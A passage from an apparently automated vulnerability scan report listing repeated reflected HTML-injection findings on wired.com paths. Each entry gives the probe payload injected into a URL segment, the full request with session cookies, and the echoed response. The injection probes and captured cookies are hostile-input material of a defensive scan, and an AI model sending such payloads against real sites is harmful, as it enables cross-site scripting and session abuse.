Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceb4ac5"><a>19e070cbea0 ss_discoveries c_news">
...[SNIP]...

1.245. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0904

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9c23"><a>3309dc6b8b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesa9c23"><a>3309dc6b8b4/news/2007/09/dayintech_0904 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:22 GMT
Date: Sun, 21 Nov 2010 23:11:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesa9c23"><a>3309dc6b8b4 c_news">
...[SNIP]...

1.246. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0904

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e49"><a>d02b8d3e523 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news78e49"><a>d02b8d3e523/2007/09/dayintech_0904 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:32 GMT
Date: Sun, 21 Nov 2010 23:11:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news78e49"><a>d02b8d3e523">
...[SNIP]...

1.247. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/10/dayintech_1010

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1916e"><a>0a35d8b532a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science1916e"><a>0a35d8b532a/discoveries/news/2007/10/dayintech_1010 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:38 GMT
Date: Sun, 21 Nov 2010 23:09:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science1916e"><a>0a35d8b532a ss_discoveries c_news">
...[SNIP]...

1.248. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/10/dayintech_1010

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 884c7"><a>bb42abaa2dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries884c7"><a>bb42abaa2dc/news/2007/10/dayintech_1010 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:04 GMT
Date: Sun, 21 Nov 2010 23:10:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries884c7"><a>bb42abaa2dc c_news">
...[SNIP]...

1.249. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/10/dayintech_1010

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf412"><a>cb3677366bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newscf412"><a>cb3677366bf/2007/10/dayintech_1010 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:24 GMT
Date: Sun, 21 Nov 2010 23:10:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newscf412"><a>cb3677366bf">
...[SNIP]...

1.250. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1105

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa58"><a>4fd1e10ab82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science1aa58"><a>4fd1e10ab82/discoveries/news/2007/11/dayintech_1105 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:34 GMT
Date: Sun, 21 Nov 2010 23:09:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science1aa58"><a>4fd1e10ab82 ss_discoveries c_news">
...[SNIP]...

1.251. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1105

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e2b"><a>c26500463e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries68e2b"><a>c26500463e9/news/2007/11/dayintech_1105 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:00 GMT
Date: Sun, 21 Nov 2010 23:10:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries68e2b"><a>c26500463e9 c_news">
...[SNIP]...

1.252. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1105

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106cc"><a>40e21ea45df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news106cc"><a>40e21ea45df/2007/11/dayintech_1105 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:21 GMT
Date: Sun, 21 Nov 2010 23:10:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news106cc"><a>40e21ea45df">
...[SNIP]...

1.253. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1112

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b3f5"><a>0ed0fcf84fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science2b3f5"><a>0ed0fcf84fd/discoveries/news/2007/11/dayintech_1112 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:30 GMT
Date: Sun, 21 Nov 2010 23:09:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science2b3f5"><a>0ed0fcf84fd ss_discoveries c_news">
...[SNIP]...

1.254. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1112

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad12b"><a>fc633443f33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesad12b"><a>fc633443f33/news/2007/11/dayintech_1112 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:53 GMT
Date: Sun, 21 Nov 2010 23:09:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesad12b"><a>fc633443f33 c_news">
...[SNIP]...

1.255. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1112

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483e8"><a>03a3277457 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news483e8"><a>03a3277457/2007/11/dayintech_1112 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:11 GMT
Date: Sun, 21 Nov 2010 23:10:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news483e8"><a>03a3277457">
...[SNIP]...

1.256. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1119

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdf3d"><a>d84d2d33c95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencecdf3d"><a>d84d2d33c95/discoveries/news/2007/11/dayintech_1119 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:26 GMT
Date: Sun, 21 Nov 2010 23:09:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencecdf3d"><a>d84d2d33c95 ss_discoveries c_news">
...[SNIP]...

1.257. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1119

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c14"><a>76302bf60a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriese5c14"><a>76302bf60a4/news/2007/11/dayintech_1119 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:49 GMT
Date: Sun, 21 Nov 2010 23:09:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriese5c14"><a>76302bf60a4 c_news">
...[SNIP]...

1.258. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1119

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b016"><a>8b57ac5dea6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news4b016"><a>8b57ac5dea6/2007/11/dayintech_1119 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:07 GMT
Date: Sun, 21 Nov 2010 23:10:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news4b016"><a>8b57ac5dea6">
...[SNIP]...

1.259. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1127 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1127

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d4ab"><a>01007bb9cc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science9d4ab"><a>01007bb9cc7/discoveries/news/2007/11/dayintech_1127 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:37 GMT
Date: Sun, 21 Nov 2010 23:09:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science9d4ab"><a>01007bb9cc7 ss_discoveries c_news">
...[SNIP]...

1.260. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1127 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1127

Issue detail

